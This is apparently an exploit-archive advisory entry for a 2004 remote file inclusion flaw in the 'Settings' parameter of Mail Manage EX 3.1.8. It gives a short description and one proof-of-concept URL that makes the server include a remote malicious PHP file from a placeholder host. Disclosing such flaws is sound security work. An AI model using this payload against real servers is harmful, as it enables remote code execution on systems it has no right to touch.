Mail Manage EX 3.1.8 MMEX - 'Settings' PHP Remote File Inclusion



EKU-ID: 29583 CVE: OSVDB-ID:
Author: The Warlock [BhQ] Published: 2004-06-03 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


source: https://www.securityfocus.com/bid/10457/info

Mail Manage EX is reportedly prone to a remote file include vulnerability. This vulnerability results from insufficient sanitization of user-supplied data and may allow remote attackers to include arbitrary PHP files located on remote servers.

This issue was discovered in Mail Manage EX 3.1.8. It is possible that previous versions are affected as well.

http://www.example.com/mail/mmex.php?Settings=http://www.example.com/malicious.php